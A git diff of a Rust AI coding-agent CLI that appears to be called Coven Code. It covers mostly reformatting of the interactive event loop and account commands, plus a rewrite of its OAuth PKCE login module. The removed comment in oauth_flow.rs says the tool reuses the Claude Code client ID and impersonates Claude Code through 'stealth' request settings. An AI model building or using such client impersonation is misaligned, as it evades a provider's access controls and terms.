claurst_core::coven_shared::default_agents_with_familiars(); + let mut all_agents = + claurst_core::coven_shared::default_agents_with_familiars(); all_agents.extend(cmd_ctx.config.agents.clone()); if let Some(def) = all_agents.get(mode) { base_query_config.agent_name = Some(mode.to_string()); @@ -2855,24 +2988,24 @@ async fn run_interactive( session.updated_at = chrono::Utc::now(); } } - Event::Paste(data) => { - // Cmd+V paste on macOS / Ctrl+Shift+V on Linux (via bracketed paste) + Event::Paste(data) if !app.is_streaming && app.permission_request.is_none() && !app.history_search_overlay.visible - && app.history_search.is_none() - { - if app.key_input_dialog.visible { - // Paste into API key input dialog - for ch in data.chars() { - app.key_input_dialog.insert_char(ch); - } - } else { - // Paste into main prompt input - app.prompt_input.paste(&data); + && app.history_search.is_none() => + { + // Cmd+V paste on macOS / Ctrl+Shift+V on Linux (via bracketed paste) + if app.key_input_dialog.visible { + // Paste into API key input dialog + for ch in data.chars() { + app.key_input_dialog.insert_char(ch); } + } else { + // Paste into main prompt input + app.prompt_input.paste(&data); } } + Event::Paste(_) => {} Event::Mouse(mouse) => { app.handle_mouse_event(mouse); } @@ -2920,7 +3053,10 @@ async fn run_interactive( Some(claurst_core::permissions::PermissionDecision::Ask { .. }) | None => { let tool_use_id = pending.tool_use_id.clone(); app.permission_request = Some(permission_request_from_core(&pending)); - pending_permissions.lock().waiting.insert(tool_use_id, pending); + pending_permissions + .lock() + .waiting + .insert(tool_use_id, pending); break; } Some(decision) => { @@ -2945,26 +3081,31 @@ async fn run_interactive( delta: text.clone(), message_id: format!("msg-{}", index), }), - QueryEvent::ToolStart { tool_name, tool_id, input_json } => { - Some(BridgeOutbound::ToolStart { - id: tool_id.clone(), - name: tool_name.clone(), - input_preview: Some(input_json.clone()), - }) - } - QueryEvent::ToolEnd { tool_id, result, is_error, .. } => { - Some(BridgeOutbound::ToolEnd { - id: tool_id.clone(), - output: result.clone(), - is_error: *is_error, - }) - } - QueryEvent::TurnComplete { stop_reason, turn, .. } => { - Some(BridgeOutbound::TurnComplete { - message_id: format!("turn-{}", turn), - stop_reason: stop_reason.clone(), - }) - } + QueryEvent::ToolStart { + tool_name, + tool_id, + input_json, + } => Some(BridgeOutbound::ToolStart { + id: tool_id.clone(), + name: tool_name.clone(), + input_preview: Some(input_json.clone()), + }), + QueryEvent::ToolEnd { + tool_id, + result, + is_error, + .. + } => Some(BridgeOutbound::ToolEnd { + id: tool_id.clone(), + output: result.clone(), + is_error: *is_error, + }), + QueryEvent::TurnComplete { + stop_reason, turn, .. + } => Some(BridgeOutbound::TurnComplete { + message_id: format!("turn-{}", turn), + stop_reason: stop_reason.clone(), + }), QueryEvent::Error(msg) => Some(BridgeOutbound::Error { message: msg.clone(), }), @@ -2981,27 +3122,41 @@ async fn run_interactive( QueryEvent::Stream(claurst_api::AnthropicStreamEvent::ContentBlockDelta { delta: claurst_api::streaming::ContentDelta::TextDelta { text }, .. - }) => Some(serde_json::json!({ - "type": "text_chunk", - "text": text, - }).to_string()), - QueryEvent::ToolStart { tool_name, tool_id, input_json } => { - Some(serde_json::json!({ + }) => Some( + serde_json::json!({ + "type": "text_chunk", + "text": text, + }) + .to_string(), + ), + QueryEvent::ToolStart { + tool_name, + tool_id, + input_json, + } => Some( + serde_json::json!({ "type": "tool_start", "tool_name": tool_name, "tool_id": tool_id, "input": input_json, - }).to_string()) - } - QueryEvent::ToolEnd { tool_name, tool_id, result, is_error } => { - Some(serde_json::json!({ + }) + .to_string(), + ), + QueryEvent::ToolEnd { + tool_name, + tool_id, + result, + is_error, + } => Some( + serde_json::json!({ "type": "tool_end", "tool_name": tool_name, "tool_id": tool_id, "result": result, "is_error": is_error, - }).to_string()) - } + }) + .to_string(), + ), _ => None, }; if let Some(payload) = relay_payload { @@ -3029,7 +3184,8 @@ async fn run_interactive( && current_query.is_none() && !app.auto_compact_running { - let used_pct = (app.context_used_tokens as f64 / app.context_window_size as f64 * 100.0) as u64; + let used_pct = + (app.context_used_tokens as f64 / app.context_window_size as f64 * 100.0) as u64; if used_pct >= 99 { app.auto_compact_running = true; let msg_count = messages.len(); @@ -3055,7 +3211,8 @@ async fn run_interactive( let tools_arc_clone = tools_arc.clone(); let ctx_clone = tool_ctx.clone(); let mut qcfg = base_query_config.clone(); - qcfg.model = claurst_api::effective_model_for_config(&cmd_ctx.config, &model_registry); + qcfg.model = + claurst_api::effective_model_for_config(&cmd_ctx.config, &model_registry); qcfg.max_tokens = cmd_ctx.config.effective_max_tokens(); let tracker = cost_tracker.clone(); let tx = event_tx.clone(); @@ -3088,7 +3245,10 @@ async fn run_interactive( if let Some(runtime) = bridge_runtime.as_mut() { loop { match runtime.tui_rx.try_recv() { - Ok(TuiBridgeEvent::Connected { session_url, session_id: conn_sid }) => { + Ok(TuiBridgeEvent::Connected { + session_url, + session_id: conn_sid, + }) => { let short = if session_url.len() > 60 { format!("{}…", &session_url[..60]) } else { @@ -3128,11 +3288,9 @@ async fn run_interactive( tokio::spawn(async move { let mut rx = rx; while let Some(payload) = rx.recv().await { - let _ = claurst_bridge::post_bridge_event( - &info_relay, - payload, - ) - .await; + let _ = + claurst_bridge::post_bridge_event(&info_relay, payload) + .await; } }); } @@ -3153,23 +3311,19 @@ async fn run_interactive( Ok(msgs) if !msgs.is_empty() => { for msg in &msgs { since_id = Some(msg.id.clone()); - if msg.role == "user" { - if poll_tx + if msg.role == "user" + && poll_tx .send(msg.content.clone()) .await .is_err() - { - return; - } + { + return; } } } _ => {} } - tokio::time::sleep( - std::time::Duration::from_secs(2), - ) - .await; + tokio::time::sleep(std::time::Duration::from_secs(2)).await; } }); } @@ -3209,7 +3363,10 @@ async fn run_interactive( let tools_arc_clone = tools_arc.clone(); let ctx_clone = tool_ctx.clone(); let mut qcfg = base_query_config.clone(); - qcfg.model = claurst_api::effective_model_for_config(&cmd_ctx.config, &model_registry); + qcfg.model = claurst_api::effective_model_for_config( + &cmd_ctx.config, + &model_registry, + ); qcfg.max_tokens = cmd_ctx.config.effective_max_tokens(); let tracker = cost_tracker.clone(); let tx = event_tx.clone(); @@ -3239,18 +3396,21 @@ async fn run_interactive( ct.cancel(); } app.is_streaming = false; - app.status_message = - Some("Cancelled by remote control.".to_string()); + app.status_message = Some("Cancelled by remote control.".to_string()); } } - Ok(TuiBridgeEvent::PermissionResponse { tool_use_id, response }) => { + Ok(TuiBridgeEvent::PermissionResponse { + tool_use_id, + response, + }) => { // Resolve a pending permission dialog if IDs match. if let Some(ref pr) = app.permission_request { if pr.tool_use_id == tool_use_id { use claurst_bridge::PermissionResponseKind; let _allow = matches!( response, - PermissionResponseKind::Allow | PermissionResponseKind::AllowSession + PermissionResponseKind::Allow + | PermissionResponseKind::AllowSession ); app.permission_request = None; } @@ -3317,7 +3477,8 @@ async fn run_interactive( let tools_arc_clone = tools_arc.clone(); let ctx_clone = tool_ctx.clone(); let mut qcfg = base_query_config.clone(); - qcfg.model = claurst_api::effective_model_for_config(&cmd_ctx.config, &model_registry); + qcfg.model = + claurst_api::effective_model_for_config(&cmd_ctx.config, &model_registry); qcfg.max_tokens = cmd_ctx.config.effective_max_tokens(); let tracker = cost_tracker.clone(); let tx = event_tx.clone(); @@ -3346,13 +3507,8 @@ async fn run_interactive( // Drain CLAUDE_STATUS_COMMAND results (most recent wins) if status_cmd_str.is_some() { - loop { - match status_cmd_rx.try_recv() { - Ok(text) => { - app.status_line_override = if text.is_empty() { None } else { Some(text) }; - } - Err(_) => break, - } + while let Ok(text) = status_cmd_rx.try_recv() { + app.status_line_override = if text.is_empty() { None } else { Some(text) }; } } @@ -3384,8 +3540,7 @@ async fn run_interactive( app.model_picker.loading_models = false; app.model_fetch_rx = None; } - Ok(Err(())) - | Err(tokio::sync::mpsc::error::TryRecvError::Disconnected) => { + Ok(Err(())) | Err(tokio::sync::mpsc::error::TryRecvError::Disconnected) => { app.model_picker.loading_models = false; app.model_fetch_rx = None; } @@ -3400,11 +3555,8 @@ async fn run_interactive( if let Some(ref mut rx) = app.user_question_rx { match rx.try_recv() { Ok(event) => { - app.ask_user_dialog.open( - event.question, - event.options, - event.reply_tx, - ); + app.ask_user_dialog + .open(event.question, event.options, event.reply_tx); } Err(tokio::sync::mpsc::error::TryRecvError::Empty) => {} Err(tokio::sync::mpsc::error::TryRecvError::Disconnected) => { @@ -3436,9 +3588,10 @@ async fn run_interactive( .map(|m| claurst_tui::model_picker::ModelEntry { id: m.id.to_string(), display_name: m.name.clone(), - description: claurst_tui::model_picker::format_context_window( - m.context_window, - ), + description: + claurst_tui::model_picker::format_context_window( + m.context_window, + ), is_current: false, }) .collect(); @@ -3482,14 +3635,18 @@ async fn run_interactive( COPILOT_CLIENT_ID, "read:user", "https://github.com/login/device/code", - ).await { + ) + .await + { Ok(resp) => { - let _ = tx2.send(DeviceAuthEvent::GotCode { - user_code: resp.user_code, - verification_uri: resp.verification_uri, - device_code: resp.device_code.clone(), - interval: resp.interval, - }).await; + let _ = tx2 + .send(DeviceAuthEvent::GotCode { + user_code: resp.user_code, + verification_uri: resp.verification_uri, + device_code: resp.device_code.clone(), + interval: resp.interval, + }) + .await; // Step 2: Poll for access token match claurst_core::device_code::poll_for_token( COPILOT_CLIENT_ID, @@ -3497,9 +3654,12 @@ async fn run_interactive( "https://github.com/login/oauth/access_token", resp.interval, 300, - ).await { + ) + .await + { Ok(token) => { - let _ = tx2.send(DeviceAuthEvent::TokenReceived(token)).await; + let _ = + tx2.send(DeviceAuthEvent::TokenReceived(token)).await; } Err(e) => { let _ = tx2.send(DeviceAuthEvent::Error(e)).await; @@ -3518,10 +3678,13 @@ async fn run_interactive( // Coven Code does not have its own registered OAuth app with Anthropic. // Users should use an API key from console.anthropic.com instead. tokio::spawn(async move { - let _ = tx2.send(DeviceAuthEvent::Error( - "Anthropic OAuth requires a registered application.\n\ - Use an API key instead: console.anthropic.com/settings/keys".to_string() - )).await; + let _ = tx2 + .send(DeviceAuthEvent::Error( + "Anthropic OAuth requires a registered application.\n\ + Use an API key instead: console.anthropic.com/settings/keys" + .to_string(), + )) + .await; }); } "codex" | "openai-codex" => { @@ -3531,14 +3694,17 @@ async fn run_interactive( tokio::spawn(async move { match crate::codex_oauth_flow::run_oauth_flow(tx2.clone()).await { Ok(tokens) => { - let _ = tx2.send(DeviceAuthEvent::TokenReceived( - tokens.access_token, - )).await; + let _ = tx2 + .send(DeviceAuthEvent::TokenReceived(tokens.access_token)) + .await; } Err(e) => { - let _ = tx2.send(DeviceAuthEvent::Error( - format!("Codex OAuth failed: {}", e), - )).await; + let _ = tx2 + .send(DeviceAuthEvent::Error(format!( + "Codex OAuth failed: {}", + e + ))) + .await; } } }); @@ -3566,8 +3732,12 @@ async fn run_interactive( // Auto-open the verification URL in the browser let _ = open::that(&verification_uri); - app.device_auth_dialog - .set_code(user_code, verification_uri, device_code, interval); + app.device_auth_dialog.set_code( + user_code, + verification_uri, + device_code, + interval, + ); app.notifications.push( claurst_tui::NotificationKind::Info, @@ -3636,7 +3806,8 @@ async fn run_interactive( messages = msgs_arc.lock().await.clone(); session.messages = messages.clone(); session.updated_at = chrono::Utc::now(); - session.model = claurst_api::effective_model_for_config(&cmd_ctx.config, &model_registry); + session.model = + claurst_api::effective_model_for_config(&cmd_ctx.config, &model_registry); session.working_dir = Some(tool_ctx.working_dir.display().to_string()); app.is_streaming = false; app.status_message = None; @@ -3669,8 +3840,16 @@ async fn run_interactive( for msg in &session.messages { let content_str = match &msg.content { claurst_core::types::MessageContent::Text(t) => t.clone(), - claurst_core::types::MessageContent::Blocks(blocks) => blocks.iter() - .filter_map(|b| if let claurst_core::types::ContentBlock::Text { text } = b { Some(text.as_str()) } else { None }) + claurst_core::types::MessageContent::Blocks(blocks) => blocks + .iter() + .filter_map(|b| { + if let claurst_core::types::ContentBlock::Text { text } = b + { + Some(text.as_str()) + } else { + None + } + }) .collect::>() .join(" "), }; @@ -3679,7 +3858,8 @@ async fn run_interactive( claurst_core::types::Role::Assistant => "assistant", }; let msg_id = msg.uuid.as_deref().unwrap_or("unknown"); - let _ = store.save_message(&session.id, msg_id, role, &content_str, None); + let _ = + store.save_message(&session.id, msg_id, role, &content_str, None); } } } @@ -3699,7 +3879,8 @@ async fn run_interactive( claurst_query::GoalContinuation::Continue { message } => { // Show a subtle status notice. app.status_message = Some( - "Goal: continuing autonomously… (use /goal pause to stop)".to_string() + "Goal: continuing autonomously… (use /goal pause to stop)" + .to_string(), ); // Update the footer badge. if let Some(goal) = claurst_core::GoalStore::open_default() @@ -3729,13 +3910,17 @@ async fn run_interactive( let tools_arc_clone = tools_arc.clone(); let mut ctx_clone = tool_ctx.clone(); let mut qcfg = base_query_config.clone(); - qcfg.model = claurst_api::effective_model_for_config(&cmd_ctx.config, &model_registry); + qcfg.model = claurst_api::effective_model_for_config( + &cmd_ctx.config, + &model_registry, + ); qcfg.max_tokens = cmd_ctx.config.effective_max_tokens(); qcfg.append_system_prompt = cmd_ctx.config.append_system_prompt.clone(); qcfg.system_prompt = base_query_config.system_prompt.clone(); qcfg.output_style = cmd_ctx.config.effective_output_style(); qcfg.output_style_prompt = cmd_ctx.config.resolve_output_style_prompt(); - qcfg.working_directory = Some(tool_ctx.working_dir.display().to_string()); + qcfg.working_directory = + Some(tool_ctx.working_dir.display().to_string()); // Re-inject the goal addendum for this continuation turn. if let Some(goal) = claurst_core::GoalStore::open_default() .and_then(|s| s.get_active_goal(&session.id)) @@ -3752,17 +3937,23 @@ async fn run_interactive( if let Some(ref cq) = qcfg.command_queue { let cq = cq.clone(); let aux_tx = bg_completion_tx.clone(); - ctx_clone.completion_notifier = Some(claurst_tools::CompletionNotifier::new(move |info: claurst_tools::BgTaskCompletion| { - let msg = format!( + ctx_clone.completion_notifier = Some( + claurst_tools::CompletionNotifier::new( + move |info: claurst_tools::BgTaskCompletion| { + let msg = format!( "[Monitor] Background task {} completed ({}).\nCommand: {}\nOutput (last 2000 chars):\n{}", info.task_id, info.exit_info, info.command, info.output_tail ); - cq.push( - claurst_query::QueuedCommand::InjectSystemMessage(msg), - claurst_query::CommandPriority::Normal, - ); - let _ = aux_tx.send(info); - })); + cq.push( + claurst_query::QueuedCommand::InjectSystemMessage( + msg, + ), + claurst_query::CommandPriority::Normal, + ); + let _ = aux_tx.send(info); + }, + ), + ); } let tracker = cost_tracker.clone(); let tx = event_tx.clone(); @@ -3831,10 +4022,8 @@ async fn run_interactive( )); } Err(error) => { - app.status_message = Some(format!( - "MCP auth failed for '{}': {}", - server_name, error - )); + app.status_message = + Some(format!("MCP auth failed for '{}': {}", server_name, error)); } } } else { @@ -4003,13 +4192,23 @@ fn print_account_list(provider: &str, display_name: &str) { let active = registry.active(provider).map(String::from); if profiles.is_empty() { println!("No {} accounts stored.", display_name); - println!("Use `coven-code {} login` to add one.", - if provider == "anthropic" { "auth" } else { provider }); + println!( + "Use `coven-code {} login` to add one.", + if provider == "anthropic" { + "auth" + } else { + provider + } + ); return; } println!("{} accounts:", display_name); for p in profiles { - let marker = if active.as_deref() == Some(&p.id) { "*" } else { " " }; + let marker = if active.as_deref() == Some(&p.id) { + "*" + } else { + " " + }; let email = p.email.as_deref().unwrap_or(""); let label = p .label @@ -4037,8 +4236,14 @@ fn switch_account(provider: &str, display_name: &str, id: Option<&str>) -> ! { std::process::exit(1); } // No id: print the picker and exit with usage. - eprintln!("Usage: coven-code {} switch ", - if provider == "anthropic" { "auth" } else { provider }); + eprintln!( + "Usage: coven-code {} switch ", + if provider == "anthropic" { + "auth" + } else { + provider + } + ); eprintln!(); print_account_list(provider, display_name); std::process::exit(1); @@ -4071,25 +4276,21 @@ async fn handle_codex_account_command(args: &[String]) -> anyhow::Result<()> { // login we still spin up the OAuth listener but route the URL // through a no-op channel; the user opens the URL in their browser // either way. - let (tx, mut rx) = - tokio::sync::mpsc::channel::(8); + let (tx, mut rx) = tokio::sync::mpsc::channel::(8); tokio::spawn(async move { while let Some(evt) = rx.recv().await { if let claurst_tui::DeviceAuthEvent::GotBrowserUrl { url } = evt { println!("Opening browser for Codex authentication..."); - println!( - "If the browser did not open, visit:\n\n {}\n", - url - ); + println!("If the browser did not open, visit:\n\n {}\n", url); } } }); - match crate::codex_oauth_flow::run_oauth_flow_with_label(tx, label.as_deref()).await - { + match crate::codex_oauth_flow::run_oauth_flow_with_label(tx, label.as_deref()).await { Ok(_) => { let registry = claurst_core::accounts::AccountRegistry::load(); println!("Successfully logged in to Codex!"); - if let Some(p) = registry.active_profile(claurst_core::accounts::PROVIDER_CODEX) { + if let Some(p) = registry.active_profile(claurst_core::accounts::PROVIDER_CODEX) + { if let Some(email) = &p.email { println!(" Account: {}", email); } @@ -4103,18 +4304,16 @@ async fn handle_codex_account_command(args: &[String]) -> anyhow::Result<()> { } } } - Some("logout") => { - match claurst_core::oauth_config::clear_codex_tokens() { - Ok(_) => { - println!("Logged out of the active Codex account."); - std::process::exit(0); - } - Err(e) => { - eprintln!("Logout failed: {}", e); - std::process::exit(1); - } + Some("logout") => match claurst_core::oauth_config::clear_codex_tokens() { + Ok(_) => { + println!("Logged out of the active Codex account."); + std::process::exit(0); } - } + Err(e) => { + eprintln!("Logout failed: {}", e); + std::process::exit(1); + } + }, Some("list") | Some("ls") | Some("accounts") => { print_account_list(claurst_core::accounts::PROVIDER_CODEX, "Codex"); std::process::exit(0); @@ -4384,7 +4583,10 @@ async fn auth_status(json_output: bool) { } else if let Some(env_var) = claurst_core::config::primary_api_key_env_var_for_provider(active_provider) { - format!("Set {} or store a credential for {}.", env_var, api_provider) + format!( + "Set {} or store a credential for {}.", + env_var, api_provider + ) } else { format!("Configure credentials for {}.", api_provider) }; diff --git a/src-rust/crates/cli/src/oauth_flow.rs b/src-rust/crates/cli/src/oauth_flow.rs index 16de45c..c1e10b8 100644 --- a/src-rust/crates/cli/src/oauth_flow.rs +++ b/src-rust/crates/cli/src/oauth_flow.rs @@ -1,469 +1,480 @@ -// OAuth 2.0 PKCE login flow for the Coven Code CLI. -// -// Uses the Claude Code client ID and impersonates Claude Code at request time -// (see `claurst_core::oauth_config` for the impersonation constants and -// `claurst_api::AnthropicClient::apply_oauth_stealth` for how they're applied). -// Claude Pro/Max tokens used through Coven Code draw from the account's "extra -// usage" pool, not subscription quota — users should be aware of this before -// switching from API-key auth. -// -// Implements the same flow as the TypeScript OAuthService + authLogin(): -// 1. Generate PKCE code_verifier / code_challenge / state -// 2. Start a temporary localhost HTTP server on a random port -// 3. Build auth URL; print for the user and attempt to open in browser -// 4. Wait (with 60-second timeout) for: -// a. Automatic redirect to localhost/callback, OR -// b. User manually pastes the authorization code at the terminal -// 5. Exchange the authorization code for tokens via POST to TOKEN_URL -// 6. For Console flow: call create_api_key endpoint to get an API key -// 7. Save OAuthTokens to ~/.coven-code/oauth_tokens.json -// 8. Return the credential (API key or Bearer token) - -use anyhow::{bail, Context}; -use claurst_core::oauth::{self, OAuthTokens}; -use serde::Deserialize; -use std::time::Duration; -use tokio::io::{AsyncBufReadExt, AsyncWriteExt, BufReader}; -use tokio::net::TcpListener; -use tracing::{debug, info, warn}; -#[allow(unused_imports)] -use url::Url; - -// ---- Token exchange response ------------------------------------------------ - -#[derive(Debug, Deserialize)] -struct TokenExchangeResponse { - access_token: String, - #[serde(default)] - refresh_token: Option, - expires_in: u64, - #[serde(default)] - scope: Option, - #[serde(default)] - account: Option, - #[serde(default)] - organization: Option, -} - -// ---- API key creation response ---------------------------------------------- - -#[derive(Debug, Deserialize)] -struct CreateApiKeyResponse { - raw_key: Option, -} - -// ---- Public entry point ----------------------------------------------------- - -/// Outcome of a completed login flow. -#[derive(Debug, Clone)] -pub struct LoginResult { - /// The credential to use: either an API key (Console flow) or Bearer token (Claude.ai). - #[allow(dead_code)] - pub credential: String, - /// When true, present as `Authorization: Bearer `. - pub use_bearer_auth: bool, - /// Cached tokens saved to disk. - pub tokens: OAuthTokens, -} - -/// Run the interactive OAuth PKCE login flow. -/// -/// `login_with_claude_ai` selects the authorization endpoint: -/// - `false` → Console endpoint (creates an API key) -/// - `true` → Claude.ai endpoint (user:inference scope, Bearer auth) -pub async fn run_oauth_login_flow(login_with_claude_ai: bool) -> anyhow::Result { - run_oauth_login_flow_with_label(login_with_claude_ai, None).await -} - -/// Same as [`run_oauth_login_flow`] but lets the caller supply a human-friendly -/// label for the new profile (e.g. "work"). When `label` is `None` the profile -/// id is derived from the JWT email or account_uuid. -pub async fn run_oauth_login_flow_with_label( - login_with_claude_ai: bool, - label: Option<&str>, -) -> anyhow::Result { - // 1. PKCE - let code_verifier = oauth::generate_code_verifier(); - let code_challenge = oauth::generate_code_challenge(&code_verifier); - let state = oauth::generate_state(); - - // 2. Bind random localhost port for the callback server - let listener = TcpListener::bind("127.0.0.1:0") - .await - .context("Failed to bind OAuth callback server")?; - let port = listener.local_addr()?.port(); - - // 3. Build auth URLs - let authorize_base = if login_with_claude_ai { - oauth::CLAUDE_AI_AUTHORIZE_URL - } else { - oauth::CONSOLE_AUTHORIZE_URL - }; - let manual_url = oauth::build_auth_url(&authorize_base, &code_challenge, &state, port, true); - let automatic_url = oauth::build_auth_url(&authorize_base, &code_challenge, &state, port, false); - - // 4. Print URL and try to open browser - println!("\nOpening browser for authentication..."); - println!("If the browser did not open, visit:\n\n {}\n", manual_url); - try_open_browser(&automatic_url); - - // 5. Wait for auth code (automatic callback OR manual paste) - let auth_code = - wait_for_auth_code_impl(listener, &state).await.context("OAuth callback failed")?; - debug!("OAuth auth code received"); - - // 6. Exchange code for tokens - let token_resp = exchange_code_for_tokens(&auth_code, &state, &code_verifier, port, false) - .await - .context("Token exchange failed")?; - - let expires_at_ms = chrono::Utc::now().timestamp_millis() - + (token_resp.expires_in as i64 * 1000); - - let scopes: Vec = token_resp - .scope - .as_deref() - .unwrap_or("") - .split_whitespace() - .map(String::from) - .collect(); - - let account_uuid = token_resp - .account.as_ref() - .and_then(|a| a.get("uuid").and_then(|v| v.as_str()).map(String::from)); - let email = token_resp - .account.as_ref() - .and_then(|a| a.get("email_address").and_then(|v| v.as_str()).map(String::from)); - let organization_uuid = token_resp - .organization.as_ref() - .and_then(|o| o.get("uuid").and_then(|v| v.as_str()).map(String::from)); - - let uses_bearer = scopes.iter().any(|s| s == oauth::CLAUDE_AI_INFERENCE_SCOPE); - - // 7. For Console flow, exchange the access token for an API key - let api_key = if !uses_bearer { - match create_api_key(&token_resp.access_token).await { - Ok(key) => { - info!("OAuth API key created successfully"); - Some(key) - } - Err(e) => { - warn!("Failed to create API key from OAuth token: {}", e); - None - } - } - } else { - None - }; - - // 8. Build and persist tokens - let tokens = OAuthTokens { - access_token: token_resp.access_token.clone(), - refresh_token: token_resp.refresh_token.clone(), - expires_at_ms: Some(expires_at_ms), - scopes: scopes.clone(), - account_uuid, - email, - organization_uuid, - subscription_type: None, - api_key: api_key.clone(), - }; - tokens - .save_and_register(label) - .await - .context("Failed to save OAuth tokens")?; - - let (credential, use_bearer_auth) = if uses_bearer { - (token_resp.access_token.clone(), true) - } else if let Some(key) = api_key { - (key, false) - } else { - bail!("Login succeeded but could not obtain a usable credential") - }; - - Ok(LoginResult { credential, use_bearer_auth, tokens }) -} - -// ---- Helpers ---------------------------------------------------------------- - -/// Attempt to open the URL in the system default browser (best-effort). -fn try_open_browser(url: &str) { - #[cfg(target_os = "windows")] - { - // Use PowerShell to safely open URLs containing special characters (& etc.) - let ps_cmd = format!("Start-Process '{}'", url.replace('\'', "''")); - let _ = std::process::Command::new("powershell") - .args(["-NoProfile", "-NonInteractive", "-Command", &ps_cmd]) - .stdin(std::process::Stdio::null()) - .stdout(std::process::Stdio::null()) - .stderr(std::process::Stdio::null()) - .spawn(); - } - #[cfg(target_os = "macos")] - { - let _ = std::process::Command::new("open") - .arg(url) - .stdin(std::process::Stdio::null()) - .stdout(std::process::Stdio::null()) - .stderr(std::process::Stdio::null()) - .spawn(); - } - #[cfg(not(any(target_os = "windows", target_os = "macos")))] - { - let _ = std::process::Command::new("xdg-open") - .arg(url) - .stdin(std::process::Stdio::null()) - .stdout(std::process::Stdio::null()) - .stderr(std::process::Stdio::null()) - .spawn(); - } -} - -/// Tiny async HTTP server that captures /callback?code=AUTH_CODE&state=STATE. -async fn run_callback_server(listener: TcpListener, expected_state: &str) -> anyhow::Result { - debug!("OAuth callback server listening on port {}", listener.local_addr()?.port()); - - // Accept exactly one connection (the browser redirect) - let (mut socket, _) = tokio::time::timeout( - Duration::from_secs(120), - listener.accept(), - ) - .await - .context("Timeout waiting for browser redirect")? - .context("Accept failed")?; - - // Read the HTTP request line-by-line until the blank line - let (reader, mut writer) = socket.split(); - let mut reader = BufReader::new(reader); - let mut request_line = String::new(); - reader.read_line(&mut request_line).await?; - - // Drain remaining headers - loop { - let mut header = String::new(); - reader.read_line(&mut header).await?; - if header.trim().is_empty() { - break; - } - } - - // Parse the request line: "GET /callback?code=XXX&state=YYY HTTP/1.1" - let path = request_line - .split_whitespace() - .nth(1) - .unwrap_or("") - .to_string(); - - let parsed_url = url::Url::parse(&format!("http://localhost{}", path)) - .context("Failed to parse callback URL")?; - - let code = parsed_url - .query_pairs() - .find(|(k, _)| k == "code") - .map(|(_, v)| v.to_string()); - - let received_state = parsed_url - .query_pairs() - .find(|(k, _)| k == "state") - .map(|(_, v)| v.to_string()); - - // Send success redirect to the browser before validating, so the browser shows a page - let location = if received_state.as_deref() == Some(expected_state) && code.is_some() { - oauth::CLAUDEAI_SUCCESS_URL - } else { - oauth::CLAUDEAI_SUCCESS_URL // Show same page on error (browser UX) - }; - - let response = format!( - "HTTP/1.1 302 Found\r\nLocation: {}\r\nContent-Length: 0\r\nConnection: close\r\n\r\n", - location - ); - writer.write_all(response.as_bytes()).await?; - - // Validate - if received_state.as_deref() != Some(expected_state) { - bail!("OAuth state mismatch — possible CSRF attack"); - } - let code = code.context("No authorization code in callback")?; - - Ok(code) -} - -/// Read a single line from stdin (for manual code paste). -async fn read_line_from_stdin() -> anyhow::Result { - print!(" Or paste authorization code here: "); - use std::io::Write; - std::io::stdout().flush().ok(); - - let mut line = String::new(); - let stdin = tokio::io::stdin(); - let mut reader = BufReader::new(stdin); - reader.read_line(&mut line).await?; - Ok(line) -} - -/// Exchange the authorization code for OAuth tokens. -async fn exchange_code_for_tokens( - code: &str, - state: &str, - code_verifier: &str, - port: u16, - use_manual_redirect: bool, -) -> anyhow::Result { - let redirect_uri = if use_manual_redirect { - oauth::MANUAL_REDIRECT_URL.to_string() - } else { - format!("http://localhost:{}/callback", port) - }; - - let body = serde_json::json!({ - "grant_type": "authorization_code", - "code": code, - "redirect_uri": redirect_uri, - "client_id": oauth::CLIENT_ID, - "code_verifier": code_verifier, - "state": state, - }); - - let client = reqwest::Client::builder() - .timeout(Duration::from_secs(30)) - .build()?; - - let resp = client - .post(oauth::TOKEN_URL) - .header("content-type", "application/json") - .json(&body) - .send() - .await - .context("Token exchange HTTP request failed")?; - - if !resp.status().is_success() { - let status = resp.status(); - let text = resp.text().await.unwrap_or_default(); - bail!("Token exchange failed ({}): {}", status, text); - } - - resp.json::() - .await - .context("Failed to parse token exchange response") -} - -/// Exchange an OAuth access token for an Anthropic API key (Console flow only). -async fn create_api_key(access_token: &str) -> anyhow::Result { - let client = reqwest::Client::builder() - .timeout(Duration::from_secs(30)) - .build()?; - - let resp = client - .post(oauth::API_KEY_URL) - .header("Authorization", format!("Bearer {}", access_token)) - .send() - .await - .context("API key creation request failed")?; - - if !resp.status().is_success() { - let status = resp.status(); - let text = resp.text().await.unwrap_or_default(); - bail!("API key creation failed ({}): {}", status, text); - } - - let data: CreateApiKeyResponse = resp.json().await.context("Failed to parse API key response")?; - data.raw_key.context("Server returned no API key") -} - -// ---- Refresh token flow ----------------------------------------------------- - -/// Attempt to refresh an expired access token using the stored refresh token. -/// Saves updated tokens on success. -#[allow(dead_code)] -pub async fn refresh_oauth_token(tokens: &OAuthTokens) -> anyhow::Result { - let refresh_token = tokens - .refresh_token - .as_deref() - .context("No refresh token available")?; - - let body = serde_json::json!({ - "grant_type": "refresh_token", - "refresh_token": refresh_token, - "client_id": oauth::CLIENT_ID, - "scope": oauth::ALL_SCOPES.join(" "), - }); - - let client = reqwest::Client::builder() - .timeout(Duration::from_secs(30)) - .build()?; - - let resp = client - .post(oauth::TOKEN_URL) - .header("content-type", "application/json") - .json(&body) - .send() - .await - .context("Token refresh HTTP request failed")?; - - if !resp.status().is_success() { - let status = resp.status(); - let text = resp.text().await.unwrap_or_default(); - bail!("Token refresh failed ({}): {}", status, text); - } - - let token_resp: TokenExchangeResponse = resp.json().await?; - let expires_at_ms = chrono::Utc::now().timestamp_millis() - + (token_resp.expires_in as i64 * 1000); - - let scopes: Vec = token_resp - .scope - .as_deref() - .unwrap_or("") - .split_whitespace() - .map(String::from) - .collect(); - - let mut updated = tokens.clone(); - updated.access_token = token_resp.access_token; - if let Some(new_rt) = token_resp.refresh_token { - updated.refresh_token = Some(new_rt); - } - updated.expires_at_ms = Some(expires_at_ms); - updated.scopes = scopes; - - updated.save().await?; - Ok(updated) -} - -/// Wait for the OAuth authorization code from either the browser redirect (automatic) -/// or manual paste by the user. Races the two with a 120-second timeout. -async fn wait_for_auth_code_impl( - listener: TcpListener, - expected_state: &str, -) -> anyhow::Result { - let expected_state_clone = expected_state.to_string(); - let (cb_tx, cb_rx) = tokio::sync::oneshot::channel::>(); - - tokio::spawn(async move { - let result = run_callback_server(listener, &expected_state_clone).await; - let _ = cb_tx.send(result); - }); - - let (paste_tx, paste_rx) = tokio::sync::oneshot::channel::(); - tokio::spawn(async move { - if let Ok(line) = read_line_from_stdin().await { - let trimmed = line.trim().to_string(); - if !trimmed.is_empty() { - let _ = paste_tx.send(trimmed); - } - } - }); - - tokio::select! { - result = cb_rx => { - result.unwrap_or_else(|_| 